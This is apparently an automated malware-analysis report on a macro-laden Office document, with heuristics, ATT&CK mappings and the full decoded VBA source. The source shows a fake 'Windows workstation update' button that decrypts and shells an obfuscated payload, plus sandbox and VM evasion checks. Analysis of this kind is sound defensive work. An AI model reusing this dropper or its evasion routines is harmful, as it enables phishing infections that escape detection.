MALICIOUS
350
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1059.003 Windows Command Shell
T1566.001 Spearphishing Attachment
The sample is a malicious Office document containing VBA macros. The document body attempts to trick the user into clicking a button labeled 'Mise à jour de la station de travail Windows' (Windows workstation update). Upon clicking, the VBA macro executes cmd.exe, as indicated by multiple heuristics including OLE_VBA_SHELL and OLE_VBA_CMD. The macro's intent is to download and execute a second-stage payload, though the specific payload and download mechanism are obfuscated and truncated.
Heuristics 10
-
ClamAV: Doc.Dropper.Agent-6364326-0 critical CLAMAV_DETECTIONClamAV detected this file as malware: Doc.Dropper.Agent-6364326-0
-
VBA macros detected medium 5 related findings OLE_VBA_MACROSDocument contains VBA macro code
-
Potential Shell call in VBA critical OLE_VBA_SHELLPotential Shell call in VBAMatched line in script
JSYKsfbkulFLwzF = "Wsv5LQjsp7Zk1zTJ95XU84d+wa7Ve/4016/BFfco2xictpul+bCcDzOsPL1G/F0ki9sviME+tZQsbFihVP" Shell (StrConv(YMxlfeXoQkyCchX(HdrROagFHcClGMFzo(EKKdVAjzttW, JSYKsfbkulFLwzF)), vbUnicode)) Call Shell("cmd.exe /K ECHO Mise a jour de la station de travail %COMPUTERNAME% pour %USERNAME%, veuillez patienter... & ping -n 6 127.0.0.1 > nul & ECHO Mise a jour a jour complete !", vbNormalFocus) -
CreateObject call high OLE_VBA_CREATEOBJCreateObject callMatched line in script
If CreateObject("Scripting.FileSystemObject").FileExists(ThisDocument.Path & Application.PathSeparator & ThisDocument.Name & ":Zone.Identifier") Then -
GetObject call high OLE_VBA_GETOBJGetObject callMatched line in script
tns = Array("vmware", "vmtools", "vbox", "process explorer", "processhacker", "procmon", "visual basic", "fiddler", "wireshark") Set ws = GetObject("winmgmts:\\.\root\cimv2") -
cmd.exe reference in VBA high OLE_VBA_CMDcmd.exe reference in VBAMatched line in script
Shell (StrConv(YMxlfeXoQkyCchX(HdrROagFHcClGMFzo(EKKdVAjzttW, JSYKsfbkulFLwzF)), vbUnicode)) Call Shell("cmd.exe /K ECHO Mise a jour de la station de travail %COMPUTERNAME% pour %USERNAME%, veuillez patienter... & ping -n 6 127.0.0.1 > nul & ECHO Mise a jour a jour complete !", vbNormalFocus) -
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)Matched line in script
Dim userDomain As String userDomain = Environ$("userdomain") -
Suspicious cmd.exe invocation with execution flag high SC_STR_CMDSuspicious cmd.exe invocation with execution flag
-
Suspicious extracted artifact high EXTRACTED_FILE_STATIC_TRIAGEOne or more files extracted from inside this sample matched static suspicious-content checks such as script obfuscation, encoded payload blobs, packed data, or execution/download terms.
-
Embedded URL info EMBEDDED_URLOne or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
Extracted artifacts 1
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 44648 bytes |
SHA-256: 91c6cdef2d838a65a14af479a16554fc3c73808673b588b19f9ffc2bf9619b75 |
|||
|
Detection
ClamAV:
No threats found
Obfuscation or payload:
likely
185 of 367 identifiers look randomly generated (e.g. 'dAV5aLRSox1FNDD5neJYMFZblXYwAgPKZJnC3Ikd') — consistent with name-mangling obfuscation. Carved artifact contains 20 long base64-like blob(s).
|
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "Mise_a_jour_de_la_station_de_travail1, 0, 0, MSForms, CommandButton"
Private Sub Mise_a_jour_de_la_station_de_travail1_Click()
Call mise_a_jour_windows
End Sub
Attribute VB_Name = "Module1"
Sub mise_a_jour_windows()
On Error Resume Next
'If checkRecentDocs Then
'MsgBox ("1")
'Exit Sub
'End If
'If checkNbrOfTask Then
'MsgBox ("2")
'Exit Sub
' End If
'If Not checkTasks Then
'Exit Sub
'End If
'checkZoneIdentifier
'checkPartOfDomain
'If checkBios Then
''MsgBox ("3")
'Exit Sub
' End If
'If checkPnP Then
'MsgBox ("4")
'Exit Sub
'End If
'If checkUsername Then
'MsgBox ("5")
'Exit Sub
'End If
'If checkFilenameHash Then
'MsgBox ("6")
'Exit Sub
' End If
'If checkFilenameBad Then
'Exit Sub
'End If
'checkPreciseFileName
'checkCores
'If checkAppCount Then
'Exit Sub
' End If
'If checkApps Then
'Exit Sub
'End If
'If verifyPreciseDomain Then
'Exit Sub
'End If
Dim JSYKsfbkulFLwzF As String
Dim EKKdVAjzttW As String
Dim cTdzQWOUWEEVexjiF As String
Dim TkvnhzpvknoLxyTmn As String
Dim fXhXNVEleO As String
Dim NJqYJJYErv As String
Dim hDXThtgUsEh As String
Dim rkqdOMkxmnSp As String
Dim WauMdbKKmxueesFlTRlH As String
Dim wxpLHjNnjVZ As String
Dim pUCAotjVuCQBfkftGrwC As String
Dim FhnDRjyhZREVMT As String
cTdzQWOUWEEVexjiF = "OMm1WEG35CB10cfBkZepJ38LUfkeK4HwnJPU7plwIw2+1r6eiWTFSogVe1LHUPBjbzeKtlPbY1CKWErjH8U=PEnxK1NheiLSSSdgZMaITxoR1FNgD5xmJYzTZddXYE3gIlHJWC3ab9K6O7=LbMbdzib9s4PLc6CzVVMm7gjsab28rA7J24NG4EDIduZ1QjnYOBI/8e=8MNWiQffy1rXZiLqoSOQDVhLHhyBlvReWclPSlxk2GE8sHl0GPZr/zEhhngLccSdsVCaUISoTVwO=DNe9J0zFoQhXVdNzGLZls33m29xL27LBbMR1zwdTfZNL86/88sMg39jcab2jBAzv24qa4YqugK21urnqJVICTe=OENFbQfbj1h6QiLXNSzeDVD8k7iB3YzeJvYSG1xI6GM1eHN4D7/f/FlcMzMLVandEEQf4ISUiVsmND3UmUHNFptdwKGNZ/1ZP93UKU9Jp29nGb01+zvcTQxNLfg/3VsM8UgjVFpt3"
TkvnhzpvknoLxyTmn = "BANs2OSq7k0u1=0f3mn+HgIj2jjPCNM+QfRN12fQs/8NjTXRyvL47BB9vJeRloHl1xNlGi7eUlsDJ/h9fgsn6MLFanlyEQ1KISGWVsvMVnem8QYH6PFAvtNE/1xO93dAU6xb25szSV7+wjf1CSNQr9/fvsdb79i7FH2VBbNje26qMavs1=0KHmnNdgOa2jf0CpmzQ1rN1pCQ0ub7k2X7VXL=gEHslzKBlcPp1UWDGGce5ftR/xhv6dspqv/8anj1EGfhIoCWOVjMbFLUfuYJgPFtvtBqg18M93iHU1kseqNzNIfIuYfZ5qNtp9vElv2q7kMvFM0Dlk7jcIUi4xv+pk0cUcnPRgAl2IjyCOxKRacNW94XHP8BGnXuup/zJEtvlj4gle/1P+/DTEfeA8gfPbhLK99QfMxAadl1EkvinniWpMm+=5LcJuYNMPJvl3Y/gGZO9diSd1vsO5=8FMfo9YfwCSBkr9i2l4gn7/3AFQtDhJqlT2UX"
fXhXNVEleO = "Lbvve=yPhmDUR8Ih2IwnCmmKS9v7eW4ADg8TwngYeX7UJgHslgJdYMH1wBCRiEftt4gBrx=oK9N6fMUHamHA04git0oBNwmdAZLPgu+NZqdblO3og/1VNG3S3dKY2y=q+vfXW9r7sSYhr6p5l3=IKewA6M9R5d73e4Um4bDHd=MXhx8RRK97erRngzMObzfB6W4D8fiyS4fpenw1Jg+jYNDdzoP1Y1Cd1Bfq24YrPbnHK6MefheSa17AFwa3gro+xwm7=5/eJu09Z3RXldOggChVsEwc5dK0O7=gbMr/zYdTs0B6rkkzlhgIs8rgAp27mA75247t4bbHd=6phHXYJVK7h8f=pwWxYOfSlr6KiWbpSogle1pHJRSjtjeK/oPvlxCLiBrsH8tePym/Klgh62wSEwGAmQaInSoqAwN5D58aJY7TZwBXYcDgIgZJ5C3yvgKwO7yIbMlxz=b9sTDLcpzzdVMmbdjqnp2FcL7624EO4b7kdUp1"
NJqYJJYErv = "QTzYOKI/ee=8p2WvUfrw1rx8iWLNSo0D/p7HcyBlhOelqYPnlxkEGEv8H+lDPYa/zghhnILcDHdskQaJISoGVwjXD5U=JjdFoQhXViYz/1Zlq33h3gxe27f9bIDwz6cTbrSLfd/8qjMgG9j9XpGUBA5A24oL4BkugU819jnqOgIy5j=xENFQQfdp1h68iLINSsXDQQ8k8iB3vJeYloPL1xLGGMdeHhrDBan/cFshTtLVwSd=m5fEISuOV=gNDKemUzYF3nFwvGNiCLZWVtU3U92m27ESbgY+GHbTK+YVq1/qqsM/tg3LFp+DBECs2O5q7I0uMc0fyHnMJgIjcejKCNpwQuro12CQhI=NJzeDq+LJ8EBglztglo501BCVGybeUasDFbh/9gsnSML4zHl=EQMVI0JDVIWMFB7mhQYFIqFVl3NdxKZA93bBU6Kb2ZrzSVY+kwf1lqNPqd/Evsd779izFHaGByNjDRUqLbvs1c0KXcnfgVOF"
hDXThtgUsEh = "2jfYC/oCQ7bNPmfQTm87m4XfqvLFfBH1lzW3lcPP1sLDtg=ewhgRFxh3T9siqvL+anaEEwcVITCWON3Mbh8UsjYJSPFRl3BDg1H/938HUrKs2qNzRMf+w9frAqNUIgvolvp4768AFM+DlC5jhHzqHxvE6c0ThmnRRgV12jE6CAuKRgcN4r4XTg8W=IXkupXuJESFlzcgle51PICD=FvTpagTYbh0T9MWfMwAanh1EK6iILQWxwmM8ZL/JuYiTPIWl3P8g1=t9bbSU3/s67=zttfNzYf/sSBur9iRlSh/7krAm7tDAb7lT2UIVxvt/k0OhmOTR8Al2MNnxreKYav7g94A0W88+4XEeXOyJMWFlrDdlUb1WGIRyPfB58g1Jx=hK9cufIUAaudA04UiB0oB1wmy=5Ljgu+DZqcOlp+3gT6VWRmSvsuYcn=Pfvf5w9rosSYBrkpSlLdIlEiA6Q9R3k7374UGHx5Hd=JlhLwRRTi7eeBng/WO"
rkqdOMkxmnSp = "MVfBWr408fi9S4eVeuL1JrTjYJ6ddlPfeACT5Pf7B4YdPbaCKkMhf0xS4HEA/wa3=roFUFmjD5XdJuwFZdValODg2yZVacwck9KM77=r5MNwzYcEsTPKr/7zlmUIGgjgmo2T3A7H247t4bGndK2PhQzYJgK7O7==5NWBZOf+YW60iWTmSTQGeDiHJR7jtjeKKbPbWxCL2BPiH8rpPbG/KkOhei7Sk/dAV5aLRSox1FNDD5neJYMFZblXYwAgPKZJnC3IkdKH8yjEbM7Dzib9s4WLc6CzVVMIt9juAs2urACI24wH4EGZdn61QmbYOhA/02=f5NWdUfrA1rdZiCVNSJdD//CHWF+lYzelboPsR1kRGEdSH+YDPan/z/XhUgLcendLEQauqqR0VwQTDN79J50FZkFXbEYzGgZ6hG3TU9xO27LIb8b+zXbTsLPLp8i8hvMKs9j3FpGMBAxv2TSq4YCugk21DrnqODIo2j=/ENWbQfdw1hPR"
WauMdbKKmxueesFlTRlH = "imzNH2lDkvLkNiB3/RefdYSA1xI6GgYeHTsDBbN/fkcM65LaKndjFQfWISiDVsmNDv/mN90F3tdwqGNYb1Zz93UqU9Qk27iSbVd+GifTC4NVG9/YYvMNG93QFpLGBz6022Sq7avu12JfHrn9HgIR8ej4CNu5Qu1o1bQQhCqNmqeRyvLJ7BB9tztMloAR1x4VGg=eUTrDYuh9F1sCSMLdKnlbEQMVI0vDVI+MDnem8jYHoWFpdtNqg1Z093mTUkxD2eNzS27+kxf1frN7Ld/pvsdN79BzFprlBdCje26qzBmswU0ZXcncoVOi2jfYCpoKQzcN4VQQ8g87H2XMCXL/JEBTlzwjlcH11+ODTJ=ewftRF/hs=gsVxM/QanGOEwRVIrTWOTQMqBLmL7YwTPFzvt8pg1hp9pwOUldse78z53vIkxfZgqNUfgvRlv=n763AFEoD3K6j64UqkYv+zk0AUcnvRgvH2xMxCiMKQ3fNlq4QYf8v+4Xr"
wxpLHjNnjVZ = "upXLJEUFljeBl5L1PZLDCvveg4gfYbhH9g9XfMeSanhvEF1inx7WxGmMQ5L2L7YWZqF3l3gWg1=Y9D3Sdelsce=zftfAA9fHsSBWr9GolvWI7kVAm7rDlQqjTnUPBbvF/k0lhmSKR80S21jnCZWKUav7wq4zSW8gwnXIeXx1JMUsle6dYoX1W/IRCiftgagkPb=oK9XHfMUAaDEA0E1izoUWuFmO=5Lxf7+IZqNjlpAfgThV9jwS+1KY7n=JtvfuzYrSsSwur6V5l4WIl1HAnx9D5L7i0nUZzbv4d=ThhLzrRAO72o=ngJMOZVfqg94hHf8fS4AGeucHJgOjzKvdzbPf49Cd8PfoH8g=PbnuK9OQfSwSaJFAZ1aigSorzwmuvZX=JuwTZ3NXlD+gglHVNC3c+9KIRy=QbMrzzYdUsSOLr17zYLYIKEjABs2dlA7nO4Q44b04d=c1hjOYJT87D7==x4WRMVfs1r4UiWVmSTeVeuSHNg+j"
pUCAotjVuCQBfkftGrwC = "adedSoPElxC6iBr7H8rGPEA/K/3hfs8SkmdgkCa6MqodVwNGD5hfJudmZdtXY=AgbyZJB33V3gKX8yjUbMc7zib9soBLrsizzZMmsdjL5b2BBACw24ER4bfZdqY1QHWYOXA7Te=z72WyUffr1rCGiWFESuXD/hiHhYBlSzeu/lPAY1C=GE7LHlgVPBn/zkchUgLcamduFQaFRSReVwQsD53GJj+FokFXaCNgwKZ6N33AegxL27LIb8fwzZ2Tb=WLtkiz8sM7K9jRabGIBAg=2olE4v9ugfp1lI1Y8gIBej=e72FNQfvw1h6/iIiNHHeD+nLkaiBizzeBtoSM1xYaGgf3HTUDB58/+kcMetLq4ndym5faISUVV=jXD3UmNBNF3odwKCN9KLZvVt3KU9/e27nzb01+GHbTK+YLU9/3VsM279uCFpLGBE5j2Omq7LeusmJ1UHnooVIm2j=pCNolQfTN1CPQhgqNJ2XDy+LTsPBnvJdnlobG"
FhnDRjyhZREVMT = "1xWDGU2eUa5D7va/tgsKxML2anRfEQ6uIS/iVROMVa7mF80HkWF8cGNag1Q493bSU9db2ZfzbJf+kxf1rxNQp9/5tvo=79MiFH+VBd6j2x4qzYvsec0KlcnboVOU2jgiC/WCQzbNPh4QSC87m4XT/XL/JEB6lzKMlc9h1ILDGGce5NgRf/hS8gsiqvL+anj7EGg2In7WV7mMqvLU74YK3qFmt3B1g1hV938OU8lsenBzNif+v9frCSNtr9vllvS/76jiFaoDBW7jO2Ui//v7e=0hHm8bRgVS2jE6CApKQ3fNmq4XiP82+4XG8XLbJEFsljtBlbR1PZLDCifT58gMf/he9gsLfM80ad71EMRinLQWzrg+VuLOF7Y03qJil3RDgGWt9iHSUsusDNfz1vfN9YfcAqNsr9p5lShI7/1AmO2Drz7jcnUUHxvad=ykhmpBRgCl2Ipn5AmKS3fNe94eHf8D+4gMeXc8JCMQ"
EKKdVAjzttW = cTdzQWOUWEEVexjiF + TkvnhzpvknoLxyTmn + fXhXNVEleO + NJqYJJYErv + hDXThtgUsEh + rkqdOMkxmnSp + WauMdbKKmxueesFlTRlH + wxpLHjNnjVZ + pUCAotjVuCQBfkftGrwC + FhnDRjyhZREVMT
JSYKsfbkulFLwzF = "Wsv5LQjsp7Zk1zTJ95XU84d+wa7Ve/4016/BFfco2xictpul+bCcDzOsPL1G/F0ki9sviME+tZQsbFihVP"
Shell (StrConv(YMxlfeXoQkyCchX(HdrROagFHcClGMFzo(EKKdVAjzttW, JSYKsfbkulFLwzF)), vbUnicode))
Call Shell("cmd.exe /K ECHO Mise a jour de la station de travail %COMPUTERNAME% pour %USERNAME%, veuillez patienter... & ping -n 6 127.0.0.1 > nul & ECHO Mise a jour a jour complete !", vbNormalFocus)
End Sub
Public Function checkApps() As Boolean
d = False
tns = Array("vmware", "vmtools", "vbox", "process explorer", "processhacker", "procmon", "visual basic", "fiddler", "wireshark")
Set ws = GetObject("winmgmts:\\.\root\cimv2")
Dim names() As String
ReDim names(WordBasic.AppCount())
WordBasic.AppGetNames names
For Each n In names
For Each tn In tns
If InStr(LCase(n), tn) > 0 Then
d = True
End If
Next
Next
If d Then
checkApps = True
Else
checkApps = False
End If
End Function
Public Function checkAppCount() As Boolean
If WordBasic.AppCount() < 50 Then
checkAppCount = True
Else
checkAppCount = False
End If
End Function
Public Function checkPreciseFileName() As Boolean
badName = False
If ActiveDocument.Name <> "Pafish.docm" Then
badName = True
End If
If badName Then
checkPreciseFileName = True
Else
checkPreciseFileName = False
End If
End Function
Public Function checkFilenameHash() As Boolean
hexchars = "0123456789abcdef"
c = 0
For i = 1 To Len(ThisDocument.Name)
s = Mid(LCase(ThisDocument.Name), i, 1)
If InStr(s, hexchars) > 0 Then
c = c + 1
End If
Next
If c >= (Len(ThisDocument.Name) - 5) Then
checkFilenameHash = True
Else
checkFilenameHash = False
End If
End Function
Public Function checkFilenameBad() As Boolean
badName = False
badNames = Array("malware", "myapp", "sample", ".bin", "mlwr_", "Desktop")
For Each n In badNames
If InStr(LCase(ActiveDocument.FullName), n) > 0 Then
badName = True
End If
Next
If badName Then
checkFilenameBad = True
Else
checkFilenameBad = False
End If
End Function
Public Function checkTasks() As Boolean
badTask = False
badTaskNames = Array("vbox", "vmware", "vxstream", "autoit", "vmtools", "tcpview", "wireshark", "process explorer", "visual basic", "fiddler")
For Each Task In Application.Tasks
For Each badTaskName In badTaskNames
If InStr(LCase(Task.Name), badTaskName) > 0 Then
badTask = True
End If
Next
Next
If badTask Then
checkTasks = True
Else
checkTasks = False
End If
End Function
Public Function checkCores() As Boolean
badCores = 0
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_Processor", , 48)
For Each objItem In colItems
If objItem.NumberOfCores < 3 Then
badCores = True
End If
Next
If badCores Then
printMsg "DETECTED"
Else
printMsg "OK"
End If
End Function
Public Function checkBios() As Boolean
badBios = False
badBiosNames = Array("virtualbox", "vmware", "kvm")
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_Bios", , 48)
For Each objItem In colItems
For Each badName In badBiosNames
If InStr(LCase(objItem.SMBIOSBIOSVersion), badName) > 0 Then
badBios = True
End If
If InStr(LCase(objItem.SerialNumber), badName) > 0 Then
badBios = True
End If
Next
Next
If badBios Then
checkBios = True
Else
checkBios = False
End If
End Function
Public Function checkPnP() As Boolean
badPNP = False
badPNPNames = Array("VEN_80EE", "VEN_15AD")
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_PnPEntity", , 48)
For Each objItem In colItems
For Each badName In badPNPNames
If InStr(LCase(objItem.DeviceId), badName) > 0 Then
badPNP = True
End If
Next
Next
If badPNP Then
checkPnP = True
Else
checkPnP = False
End If
End Function
Public Function checkUsername() As Boolean
badUsername = False
badUsernames = Array("admin", "malfind", "sandbox", "test")
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)
For Each objItem In colItems
For Each badName In badUsernames
If InStr(LCase(objItem.UserName), badName) > 0 Then
badUsername = True
End If
Next
Next
If badUsername Then
checkUsername = True
Else
checkUsername = False
End If
End Function
Public Function verifyPreciseDomain() As Boolean
Dim domainToCheck As String
domainToCheck = "saturne"
Dim userDomain As String
userDomain = Environ$("userdomain")
If InStr(LCase(userDomain), LCase(domainToCheck)) Then
verifyPreciseDomain = False
Else
verifyPreciseDomain = True
End If
End
End Function
Public Function checkPartOfDomain() As Boolean
partOfDomain = False
Set objWMIService = GetObject("winmgmts:\\.\root\cimv2")
Set colItems = objWMIService.ExecQuery("Select * from Win32_ComputerSystem", , 48)
For Each objItem In colItems
If objItem.partOfDomain Then
partOfDomain = True
End If
Next
If partOfDomain Then
checkPartOfDomain = True
Else
checkPartOfDomain = False
End If
End Function
Public Function checkZoneIdentifier() As Boolean
If CreateObject("Scripting.FileSystemObject").FileExists(ThisDocument.Path & Application.PathSeparator & ThisDocument.Name & ":Zone.Identifier") Then
checkZoneIdentifier = True
Else
checkZoneIdentifier = False
End If
End Function
Public Function checkNbrOfTask() As Boolean
If Application.Tasks.Count < 3 Then
checkNbrOfTask = True
Else
checkNbrOfTask = False
End If
End Function
Public Function checkRecentDocs() As Boolean
If Application.RecentFiles.Count < 3 Then
checkRecentDocs = True
Else
checkRecentDocs = False
End If
End Function
Function HdrROagFHcClGMFzo(nKyaisQnDvP As String, ujNHJbTOMZBY As String) As String
Dim vCqgDvGgcYPFSLbAf As String
Dim VTZNPWtRsKVgfWAZHCG As Long
Dim rRDeLadOxzqFpBBe As Long
Dim fCIvqJuUQOrDpoAFFD As Long
HdrROagFHcClGMFzo = ""
vCqgDvGgcYPFSLbAf = "2/q0V8ZF=1BMa7YcLztpnTWhRNsSUg65wexEDOuomAP3X4lrkKGvIy9iQJjbHdfC+"
rRDeLadOxzqFpBBe = 1
For VTZNPWtRsKVgfWAZHCG = 1 To Len(nKyaisQnDvP)
fCIvqJuUQOrDpoAFFD = InStr(vCqgDvGgcYPFSLbAf, Mid(nKyaisQnDvP, VTZNPWtRsKVgfWAZHCG, 1)) - 1
fCIvqJuUQOrDpoAFFD = fCIvqJuUQOrDpoAFFD - (InStr(vCqgDvGgcYPFSLbAf, Mid(ujNHJbTOMZBY, rRDeLadOxzqFpBBe, 1)) - 1)
fCIvqJuUQOrDpoAFFD = (fCIvqJuUQOrDpoAFFD Mod 65)
If (fCIvqJuUQOrDpoAFFD < 0) Then
fCIvqJuUQOrDpoAFFD = fCIvqJuUQOrDpoAFFD + 65
End If
fCIvqJuUQOrDpoAFFD = fCIvqJuUQOrDpoAFFD + 1
HdrROagFHcClGMFzo = HdrROagFHcClGMFzo & Mid(vCqgDvGgcYPFSLbAf, fCIvqJuUQOrDpoAFFD, 1)
rRDeLadOxzqFpBBe = rRDeLadOxzqFpBBe + 1
If rRDeLadOxzqFpBBe > Len(ujNHJbTOMZBY) Then
rRDeLadOxzqFpBBe = 1
End If
Next VTZNPWtRsKVgfWAZHCG
End Function
Function YMxlfeXoQkyCchX(ByVal QdlDIrNTjASyeN As String) As Byte()
Dim JUiNmNdoJmWQkzCgPNyp As Object
Dim ilCuylucYGMVsPGKnYyE As Object
Set JUiNmNdoJmWQkzCgPNyp = CreateObject("MSXML2.DOMDocument")
Set ilCuylucYGMVsPGKnYyE = JUiNmNdoJmWQkzCgPNyp.createElement("b64")
ilCuylucYGMVsPGKnYyE.DataType = "bin.base64"
ilCuylucYGMVsPGKnYyE.Text = QdlDIrNTjASyeN
YMxlfeXoQkyCchX = ilCuylucYGMVsPGKnYyE.nodeTypedValue
Set ilCuylucYGMVsPGKnYyE = Nothing
Set JUiNmNdoJmWQkzCgPNyp = Nothing
End Function
' Processing file: /tmp/qstore_3kh5l398
' ===============================================================================
' Module streams:
' Macros/VBA/ThisDocument - 5357 bytes
' Line #0:
' FuncDefn (Sub Mise_a_jour_de_la_station_de_travail1())
' Line #1:
' ArgsCall (Call) mise_a_jour_windows 0x0000
' Line #2:
' EndSub
' Macros/VBA/Module1 - 40706 bytes
' Line #0:
' Line #1:
' FuncDefn (Sub mise_a_jour_windows())
' Line #2:
' OnError (Resume Next)
' Line #3:
' Line #4:
' QuoteRem 0x0004 0x0017 "If checkRecentDocs Then"
' Line #5:
' QuoteRem 0x0008 0x000C "MsgBox ("1")"
' Line #6:
' QuoteRem 0x0008 0x0008 "Exit Sub"
' Line #7:
' QuoteRem 0x0004 0x0006 "End If"
' Line #8:
' Line #9:
' QuoteRem 0x0004 0x0016 "If checkNbrOfTask Then"
' Line #10:
' QuoteRem 0x0008 0x000C "MsgBox ("2")"
' Line #11:
' QuoteRem 0x0008 0x0008 "Exit Sub"
' Line #12:
' QuoteRem 0x0003 0x0007 " End If"
' Line #13:
' Line #14:
' QuoteRem 0x0004 0x0016 "If Not checkTasks Then"
' Line #15:
' QuoteRem 0x0008 0x0008 "Exit Sub"
' Line #16:
' QuoteRem 0x0004 0x0006 "End If"
' Line #17:
' Line #18:
' QuoteRem 0x0004 0x0013 "checkZoneIdentifier"
' Line #19:
' Line #20:
' QuoteRem 0x0004 0x0011 "checkPartOfDomain"
' Line #21:
' Line #22:
' QuoteRem 0x0004 0x0011 "If checkBios Then"
' Line #23:
' QuoteRem 0x0008 0x000D "'MsgBox ("3")"
' Line #24:
' QuoteRem 0x0008 0x0008 "Exit Sub"
' Line #25:
' QuoteRem 0x0003 0x0007 " End If"
' Line #26:
' Line #27:
' QuoteRem 0x0004 0x0010 "If checkPnP Then"
' Line #28:
' QuoteRem 0x0008 0x000C "MsgBox ("4")"
' Line #29:
' QuoteRem 0x0008 0x0008 "Exit Sub"
' Line #30:
' QuoteRem 0x0004 0x0006 "End If"
' Line #31:
' Line #32:
' QuoteRem 0x0004 0x0015 "If checkUsername Then"
' Line #33:
' QuoteRem 0x0008 0x000C "MsgBox ("5")"
' Line #34:
' QuoteRem 0x0008 0x0008 "Exit Sub"
' Line #35:
' QuoteRem 0x0004 0x0006 "End If"
' Line #36:
' Line #37:
' QuoteRem 0x0004 0x0019 "If checkFilenameHash Then"
' Line #38:
' QuoteRem 0x0008 0x000C "MsgBox ("6")"
' Line #39:
' QuoteRem 0x0008 0x0008 "Exit Sub"
' Line #40:
' QuoteRem 0x0003 0x0007 " End If"
' Line #41:
' Line #42:
' QuoteRem 0x0004 0x0018 "If checkFilenameBad Then"
' Line #43:
' QuoteRem 0x0008 0x0008 "Exit Sub"
' Line #44:
' QuoteRem 0x0004 0x0006 "End If"
' Line #45:
' Line #46:
' QuoteRem 0x0004 0x0014 "checkPreciseFileName"
' Line #47:
' Line #48:
' QuoteRem 0x0004 0x000A "checkCores"
' Line #49:
' Line #50:
' QuoteRem 0x0004 0x0015 "If checkAppCount Then"
' Line #51:
' QuoteRem 0x0008 0x0008 "Exit Sub"
' Line #52:
' QuoteRem 0x0003 0x0007 " End If"
' Line #53:
' Line #54:
' QuoteRem 0x0004 0x0011 "If checkApps Then"
' Line #55:
' QuoteRem 0x0008 0x0008 "Exit Sub"
' Line #56:
' QuoteRem 0x0004 0x0006 "End If"
' Line #57:
' Line #58:
' QuoteRem 0x0004 0x001B "If verifyPreciseDomain Then"
' Line #59:
' QuoteRem 0x0008 0x0008 "Exit Sub"
' Line #60:
' QuoteRem 0x0004 0x0006 "End If"
' Line #61:
' Line #62:
' Dim
' VarDefn ilCuylucYGMVsPGKnYyE (As String)
' Line #63:
' Dim
' VarDefn JSYKsfbkulFLwzF (As String)
' Line #64:
' Dim
' VarDefn EKKdVAjzttW (As String)
' Line #65:
' Dim
' VarDefn cTdzQWOUWEEVexjiF (As String)
' Line #66:
' Dim
' VarDefn TkvnhzpvknoLxyTmn (As String)
' Line #67:
' Dim
' VarDefn fXhXNVEleO (As String)
' Line #68:
' Dim
' VarDefn NJqYJJYErv (As String)
' Line #69:
' Dim
' VarDefn hDXThtgUsEh (As String)
' Line #70:
' Dim
' VarDefn rkqdOMkxmnSp (As String)
' Line #71:
' Dim
' VarDefn WauMdbKKmxueesFlTRlH (As String)
' Line #72:
' Dim
' VarDefn wxpLHjNnjVZ (As String)
' Line #73:
' Dim
' VarDefn pUCAotjVuCQBfkftGrwC (As String)
' Line #74:
' LitStr 0x01F4 "OMm1WEG35CB10cfBkZepJ38LUfkeK4HwnJPU7plwIw2+1r6eiWTFSogVe1LHUPBjbzeKtlPbY1CKWErjH8U=PEnxK1NheiLSSSdgZMaITxoR1FNgD5xmJYzTZddXYE3gIlHJWC3ab9K6O7=LbMbdzib9s4PLc6CzVVMm7gjsab28rA7J24NG4EDIduZ1QjnYOBI/8e=8MNWiQffy1rXZiLqoSOQDVhLHhyBlvReWclPSlxk2GE8sHl0GPZr/zEhhngLccSdsVCaUISoTVwO=DNe9J0zFoQhXVdNzGLZls33m29xL27LBbMR1zwdTfZNL86/88sMg39jcab2jBAzv24qa4YqugK21urnqJVICTe=OENFbQfbj1h6QiLXNSzeDVD8k7iB3YzeJvYSG1xI6GM1eHN4D7/f/FlcMzMLVandEEQf4ISUiVsmND3UmUHNFptdwKGNZ/1ZP93UKU9Jp29nGb01+zvcTQxNLfg/3VsM8UgjVFpt3"
' St EKKdVAjzttW
' Line #75:
' LitStr 0x01F4 "BANs2OSq7k0u1=0f3mn+HgIj2jjPCNM+QfRN12fQs/8NjTXRyvL47BB9vJeRloHl1xNlGi7eUlsDJ/h9fgsn6MLFanlyEQ1KISGWVsvMVnem8QYH6PFAvtNE/1xO93dAU6xb25szSV7+wjf1CSNQr9/fvsdb79i7FH2VBbNje26qMavs1=0KHmnNdgOa2jf0CpmzQ1rN1pCQ0ub7k2X7VXL=gEHslzKBlcPp1UWDGGce5ftR/xhv6dspqv/8anj1EGfhIoCWOVjMbFLUfuYJgPFtvtBqg18M93iHU1kseqNzNIfIuYfZ5qNtp9vElv2q7kMvFM0Dlk7jcIUi4xv+pk0cUcnPRgAl2IjyCOxKRacNW94XHP8BGnXuup/zJEtvlj4gle/1P+/DTEfeA8gfPbhLK99QfMxAadl1EkvinniWpMm+=5LcJuYNMPJvl3Y/gGZO9diSd1vsO5=8FMfo9YfwCSBkr9i2l4gn7/3AFQtDhJqlT2UX"
' St cTdzQWOUWEEVexjiF
' Line #76:
